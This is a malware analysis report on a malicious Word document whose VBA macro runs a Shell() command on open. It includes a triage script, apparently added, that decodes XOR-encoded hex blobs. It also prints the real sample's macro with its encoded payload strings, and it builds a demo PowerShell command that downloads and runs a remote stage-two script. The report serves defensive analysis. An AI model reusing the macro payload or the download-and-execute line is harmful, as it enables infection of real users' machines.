Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 489ec86591684b3b…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 99.5 KB
Created: 2018-03-20 21:14:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 65cc93cca9c3af5203351d0d1168bbaf
SHA-1: ed36e4d917292d87669371caca69e515788d80f0
SHA-256: 489ec86591684b3b6c8da2addcc8bff48c0ffde1ce197eb9731010046cef6cc9
Risk score: 264

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains VBA macros with auto-execution entry points; the heuristics flag both a Document_Open and a Workbook_Open procedure. The authoring application is Microsoft Office Word and the extracted source sits in the ThisDocument module, so Document_Open is the entry point Word fires when the document is opened with macros enabled; Workbook_Open is an Excel event and does not run in Word. The critical heuristic OLE_VBA_SHELL indicates a Shell() call, which hands an arbitrary command line to the operating system. Static analysis does not recover that command line, so whether the macro downloads a second-stage payload or runs something already embedded in the document is not established here. The 70 long encoded string blobs in the extracted macros.bas are consistent with a payload carried inside the document and decoded at runtime before it reaches Shell().

Heuristics (8)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • OLE_VBA_MACROS (medium, 4 related findings): Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_DOCOPEN (high): Document_Open auto-execution macro
  • OLE_VBA_WBOPEN (high): Workbook_Open auto-execution macro
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents whose macro source is unavailable, either p-code-only or where source extraction failed, and therefore also covers VBA-stomped documents, where the source stream has been replaced but the p-code still executes.
  • EXTRACTED_FILE_STATIC_TRIAGE (info): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into drawing data, not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18879 bytes
SHA-256: 4b86099ac81260752950468338c9a0f49840c3259ea0f93859f262b0ca485bf3
Detection: ClamAV: No threats found. The ClamAV detection above fired on the OLE container, not on the decoded source stream, so a clean result on this artifact neither confirms nor contradicts the file verdict.
Obfuscation or payload: likely. The carved artifact contains 70 long base64-like blobs. The blobs visible in the preview below use only hex digits, so they are hex-encoded bytes rather than base64 (the hex alphabet is a subset of the base64 alphabet, which is why a charset-based classifier labels them base64-like). Consecutive blobs appear to be split mid-byte (IV_D ends in 4B4 and D_DYB begins with B81), so they must be concatenated in source order before any decoding attempt.
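The following is an added triage script for an artifact like macros.bas; it is not part of the report tooling or of oletools. It re-implements the checks behind the auto-exec, Shell() and encoded-blob heuristics described above, then performs the step the report stops short of: joining the hex blobs in source order (tolerating mid-byte splits) and brute-forcing a single-byte XOR mask, scoring each candidate by printable ratio and recognisable keywords. The macro it runs on is constructed inside the script; the payload text, the XOR key 0x4B and the `XorDecode` helper name are assumptions for the demonstration and were not recovered from the real sample.

```python
"""Triage of VBA source extracted from an OLE document (olevba-style output).

Added example; not part of the report or of oletools.  Finds auto-exec entry
points, execution tokens and long encoded string literals, then joins the hex
blobs in source order and brute-forces a single-byte XOR mask.
"""
import re
from typing import Dict, List, Tuple

# Procedure names Word/Excel run automatically on open/close.
AUTOEXEC = ("Workbook_Open", "Document_Open", "AutoOpen", "Auto_Open",
            "AutoExec", "Workbook_Activate", "Document_Close", "AutoClose")
# Tokens indicating process creation, COM instantiation or a network fetch.
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "ShellExecute",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "powershell",
               "cmd.exe", "Environ")
# Case-sensitive markers of a successful decode (a case-flipping wrong key
# such as mask 0x20 must not score).
KEYWORDS = (b"http://", b"https://", b"powershell", b"cmd", b".exe", b".dll",
            b"IEX", b"DownloadString", b"WScript")


def find_autoexec(src: str) -> List[str]:
    pat = r"^\s*(?:Private\s+|Public\s+)?Sub\s+{}\s*\("
    return [n for n in AUTOEXEC
            if re.search(pat.format(re.escape(n)), src, re.M | re.I)]


def find_exec_tokens(src: str) -> List[str]:
    return [t for t in EXEC_TOKENS
            if re.search(r"\b{}\b".format(re.escape(t)), src, re.I)]


def extract_blobs(src: str, min_len: int = 32) -> List[Tuple[str, str]]:
    """Quoted literals that look like encoded data, in source order.

    Hex digits are a subset of the base64 alphabet, so a blob is 'hex' only
    when every character is a hex digit; anything else is 'base64'.
    """
    pat = re.compile(r'"([A-Za-z0-9+/=]{%d,})"' % min_len)
    out = []
    for m in pat.finditer(src):
        blob = m.group(1)
        kind = "hex" if re.fullmatch(r"[0-9A-Fa-f]+", blob) else "base64"
        out.append((kind, blob))
    return out


def score(buf: bytes) -> float:
    """Printable-ASCII ratio plus a bonus for each recognisable keyword."""
    printable = sum(1 for c in buf if 0x20 <= c < 0x7F or c in (9, 10, 13))
    return printable / max(len(buf), 1) + 0.5 * sum(k in buf for k in KEYWORDS)


def xor_bruteforce(data: bytes) -> Tuple[int, bytes, float]:
    """Try every single-byte mask; return (key, plaintext, score) of the best."""
    best = (0, data, score(data))
    for key in range(1, 256):
        dec = bytes(b ^ key for b in data)
        s = score(dec)
        if s > best[2]:
            best = (key, dec, s)
    return best


def decode_hex_blobs(blobs: List[Tuple[str, str]]) -> Tuple[int, bytes, float]:
    """Join hex chunks in source order (they may be split mid-byte) and decode."""
    joined = "".join(b for kind, b in blobs if kind == "hex")
    if len(joined) % 2:
        joined = joined[:-1]  # a dangling nibble cannot form a byte
    return xor_bruteforce(bytes.fromhex(joined))


def triage(src: str) -> Dict[str, object]:
    blobs = extract_blobs(src)
    key, dec, s = decode_hex_blobs(blobs)
    return {"autoexec": find_autoexec(src),
            "exec_tokens": find_exec_tokens(src),
            "blob_count": len(blobs),
            "xor_key": key,
            "decoded_preview": dec[:120].decode("latin-1"),
            "score": round(s, 2)}


# Constructed stand-in for macros.bas.  Payload and key are invented; the real
# sample's encoding scheme is not established by the report.
SAMPLE_PAYLOAD = (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                  b".DownloadString('http://example.invalid/stage2.ps1')\"")
SAMPLE_KEY = 0x4B


def build_sample_macro(payload: bytes = SAMPLE_PAYLOAD, key: int = SAMPLE_KEY) -> str:
    hexstr = bytes(b ^ key for b in payload).hex().upper()
    # Odd chunk width so that, like the real sample, chunks split mid-byte.
    chunks = [hexstr[i:i + 61] for i in range(0, len(hexstr), 61)]
    lines = ['Attribute VB_Name = "ThisDocument"', "Option Explicit", "",
             "Sub Workbook_Open()"]
    names = []
    for i, chunk in enumerate(chunks):
        names.append("V_%d" % i)
        lines += ["Dim %s As String" % names[-1], '%s = "%s"' % (names[-1], chunk)]
    # XorDecode is a hypothetical runtime decoder standing in for the part of
    # the real macro the preview cuts off.
    lines += ["Shell XorDecode(%s), vbHide" % " & ".join(names), "End Sub"]
    return "\n".join(lines)


if __name__ == "__main__":
    for field, value in triage(build_sample_macro()).items():
        print("%-16s %s" % (field, value))
```

Run it against a real olevba dump by passing the file contents to `triage()`. The keyword bonus is what breaks ties between the true key and masks that merely keep bytes printable; on a payload that is not ASCII (shellcode, a PE) the printable ratio is meaningless and the candidate list would instead need an entropy or magic-bytes check, so treat a low `score` as "not decoded" rather than "not malicious".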
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
Dim IV_D As String
IV_D = "4B4B31598A1F4B4B4B4B824B8B4B6F4B404B8533752F504B4B614B4B4B7F324B4B7D251D31114B152B4B3E494B514B5B4B20374B76734B4B4B1B4B4B3E5B304B54554B1B4B227B144B4B124B5B1C4B104B4B1D8828134B3C68634B4B381F4B4B4B4B4B4C4B4B4B4B4"
Dim D_DYB As String
D_DYB = "B814B216A4B434B5989494B4B4D4B4B4B7F3F814B794B24114B1F5E3D544B1F4B4B294862524B414B4A4B4B111E4B4B224B4B4B524B884B4B1C4B4B104B364B2E2F667177864B4B4B4B7C744B4B6470264B4D54854B4B4B423A4B4B4B7A2A4B4B2D124B294B1E651C"
Dim EE_MP As String
EE_MP = "544D4B4B56864B79624B4B4B41576D4B274B4B4B4B4B744B47874B4B47314B66694B83574B4B4B214B4B4B774B0D4B73833B4B4B4B454B4B724B4B4B4B4B1B711382497B6B493D4B4B4B4B4B1B314B4B4C4B4B3A4B4B4B1749334B6A4B564B616F554B8B13454B4B4"
Dim BWN_KV As String
BWN_KV = "B4B0E4B626F4B4B4B24423A814B604B1513584B494B364B4B4B69454B4B7C0F4B4B4B584B4B4B4B4D844B2B414B374B464B4B4B803D4B4B4B1D888B542B4B374B4B1324511C4B4B181783654B4B4B5B114B864B8A4B4B48484B144B3B4B65154B4B4B2D4B4B4B544B"
Dim YPY_KE As String
YPY_KE = "304B3F3A5F4B4B4B26164B4B325E5A4B14364B4B744B794B434B4B3962204B4B4B793C141A4B1D4B424B5A644B6B4B68524B870E72254B4B4B7A28702A4B4B4B4B59634B2A4B4B4B4B246B4B6F202A4B4B894B4B4F4B4B654E4B814B4B754B646C60144B4A7F4B4B6"
Dim J_B As String
J_B = "05A4B4B7F4B5B507E4B4B1E694D164B3F50662E4B794B22164B4B4B404B80124B6D4B4B4B4B5C3C47164B4B4B2A55724B854B5B4B604B4B4B754B4B81496D7D184B4B214B6D4B4B164B4B6F7C6D1A4B4B754B7B4B4B191F4215894B4B4B4B1F4B604A404B344B4B51"
Dim S_EDL As String
S_EDL = "4B89607266720F174B4B4B624B4B0D7B636D7749424B694B4B64584B4B364B7C32884B4B2E394B77183F5D4B773E5C4B4583144B4B4B4B4B4B1A4B6E1A7C3D4B62774B4B4B49814B664B3573244B26644B4B42744B4B4B4B4B4B2B1C58694B0E7821214B4B274B454"
Dim NZI_KM As String
NZI_KM = "B1B7B1F4B514B2D4B16678B4B894B4B4B4B4B4B2A70464B1E324B0F4B5E4B4B4B4B4B8B4F4B294B4B4B7F4E0D28134B247E3C2B674827394B7D0C4B554B565680D24B4B896B4B1B4B2C4B4B4B4B2B194B712E83484B4B4B8272814B344B494B14534B1E664B57844B"
Dim ZY_ZLB As String
ZY_ZLB = "474B81164B484B4B344B4B4B284B4B221C4B59794B364B6C234B5A5E4B4B4B4F4B784B684B4B364B4B0C4B4B4B544B504B4B364B7F4B4B4B7B82574B6C2B4B4B414B103C6C2C8B7E4B4B65144B37894B4B615B24654B284B178B4B4B474B4B2C4E4B4B4B604B742E4"
Dim X_D As String
X_D = "B4B644B1F504B4B4B4B4B517B4B4B614B4B4B6F354B4B5F814B4B844B4B396B775A4B4B4B464B4B824B4B4B4B4B284B4B4B634B4B4B4B4B4B3C1058494B241B7C562F4B68731B234B734B188B4B4B4B1E324B4B4B203D44774B4B364B164B4B754B443D6A534B4B25"
Dim Q_C As String
Q_C = "4B4C3F4B2C4B364B4E4B4B891B6C304B4B5D4B4B554B3E4B37824B4B4B4E4B2F834B44124B4B66604B494B604B4B186E4B7A4B43477C4B0C4B4B32554B594B4B4B384B8A4B404B6C4B8A654B4B4B4B714B6671874B127E44674B721C724B8B4B4B4B4B4B51B44B4B1"
Dim UWC_C As String
UWC_C = "34B31804B814B4B6E4B590E4B2E4B4B834B4B4B4B4B4B4B4B5A4B4B4B1A6A774B42484B4B4B284B484B19321F2E4B4B434B144B374B4B4B724B374B4B5A4B4B4B4B282A4B374B114B4B6E4B4B394B6E4B174B132526855D824B4B4B2542154B66D7334B794B414B1C"
Dim T_UXL As String
T_UXL = "0F4B564B4B4B4B4C4B404B4B0E4B4B4B0D49224B4B374B4B46753447194B4B4B70158162374B0C4B4B4B614B134B4B4B4B777A2A4B844B41634B694B4B3E4F62206A4B3B454B3E4866154B4B4B4B4D4B223D7A4B4B4B4B2C4B294B23474B1E8B4B444B6979453E574"
Dim XKM_OD As String
XKM_OD = "B0E52771A4B6F18271D4B6D4B744B244B204B4F4B234B7C4B764B524B4B484B4B4B4B751A4B3B4B0D4B4B8B6B30504B314B4B4B4C4B7E4B4B4B4B7E244B7F4B4B4A56114B4B4B4B4B4B734B710D4B4B78124066104B75274B75254B4B294B4B38127A2B4B4B56238B"
Dim RM_EY As String
RM_EY = "4B164B5F7F4D5114124B684B455E4B4B4B407D4B4B56404B444B4B4B4B874B294B134B4B724B4B4B4B224B7E4B4B284B6C47224B4B1B4B4B4B464B0D4B5F4B134A4B3D714B4B5B4B4B40153F4D4A4B3A703C604C4B84404B393532384B1D4B4B4B404B4B4B4B4B4B7"
Dim Y_SP As String
Y_SP = "D124B4F6E4B4B4B6D4B566D7B4544AC2E4B512F844B62164B4B4B4B60294B4B4B4B714C4B4B4B4D4B7A4A6D8A4B4B4B4B5A4B4B4B644B134B4B50
... (truncated)